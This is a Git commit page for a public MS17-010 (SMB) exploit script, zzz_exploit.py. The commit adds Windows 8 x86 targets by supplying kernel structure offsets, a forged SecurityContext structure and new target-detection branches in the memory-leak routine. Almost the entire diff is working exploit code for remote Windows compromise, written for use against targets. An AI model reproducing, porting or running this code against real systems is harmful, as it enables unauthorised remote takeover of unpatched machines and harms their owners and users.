bozhihouc/MS17-010
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add support Win8 x86

Browse Source
This commit is contained in:
worawit
2017-07-11 15:48:06 +07:00
parent d787343067
commit af235b686e
1 changed files with 15 additions and 5 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
zzz_exploit.py
View File

@@ -7,11 +7,10 @@ import socket
import time import time
''' '''
MS17-010 exploit for Windows 7+ x64 by sleepya MS17-010 exploit for Windows 7+ by sleepya
Note: Note:
- The exploit should never crash a target (chance should be nearly 0%) - The exploit should never crash a target (chance should be nearly 0%)
- The exploit support only x64 target
- The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed - The exploit use the bug same as eternalromance and eternalsynergy, so named pipe is needed
Tested on: Tested on:
@@ -20,6 +19,7 @@ Tested on:
- Windows 8.1 x64 - Windows 8.1 x64
- Windows 2008 R2 SP1 x64 - Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64 - Windows 7 SP1 x64
- Windows 8.1 x86
- Windows 7 SP1 x86 - Windows 7 SP1 x86
''' '''
@@ -88,6 +88,13 @@ WIN8_INFO = {
'SECCTX_SIZE': 0x38, 'SECCTX_SIZE': 0x38,
} }
WIN8_32_INFO = {
'SESSION_SECCTX_OFFSET': 0x88,
'SESSION_ISNULL_OFFSET': 0x9e,
'FAKE_SECCTX': pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE': 0x24,
}
X86_INFO = { X86_INFO = {
'PTR_SIZE' : 4, 'PTR_SIZE' : 4,
'PTR_FMT' : 'I', 'PTR_FMT' : 'I',
@@ -161,10 +168,13 @@ def leak_frag_size(conn, tid, fid, info):
leakData = leakData[0x10d4:] # skip parameters and its own input leakData = leakData[0x10d4:] # skip parameters and its own input
if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag': if leakData[X86_INFO['FRAG_TAG_OFFSET']:X86_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
print('Target is 32 bit') print('Target is 32 bit')
if info['SESSION_SECCTX_OFFSET'] != WIN7_INFO['SESSION_SECCTX_OFFSET']: if info['SESSION_SECCTX_OFFSET'] == WIN7_INFO['SESSION_SECCTX_OFFSET']:
info.update(WIN7_32_INFO)
elif info['SESSION_SECCTX_OFFSET'] == WIN8_INFO['SESSION_SECCTX_OFFSET']:
info.update(WIN8_32_INFO)
else:
print('The exploit does not support this 32 bit target') print('The exploit does not support this 32 bit target')
sys.exit() sys.exit()
info.update(WIN7_32_INFO)
info.update(X86_INFO) info.update(X86_INFO)
elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag': elif leakData[X64_INFO['FRAG_TAG_OFFSET']:X64_INFO['FRAG_TAG_OFFSET']+4] == 'Frag':
print('Target is 64 bit') print('Target is 64 bit')
@@ -423,7 +433,7 @@ def exploit(target, pipe_name):
# read session struct to get SecurityContext address # read session struct to get SecurityContext address
sessionData = read_data(conn, info, info['session'], 0x100) sessionData = read_data(conn, info, info['session'], 0x100)
secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0] secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
# copy SecurityContext for restoration # copy SecurityContext for restoration
secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE']) secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])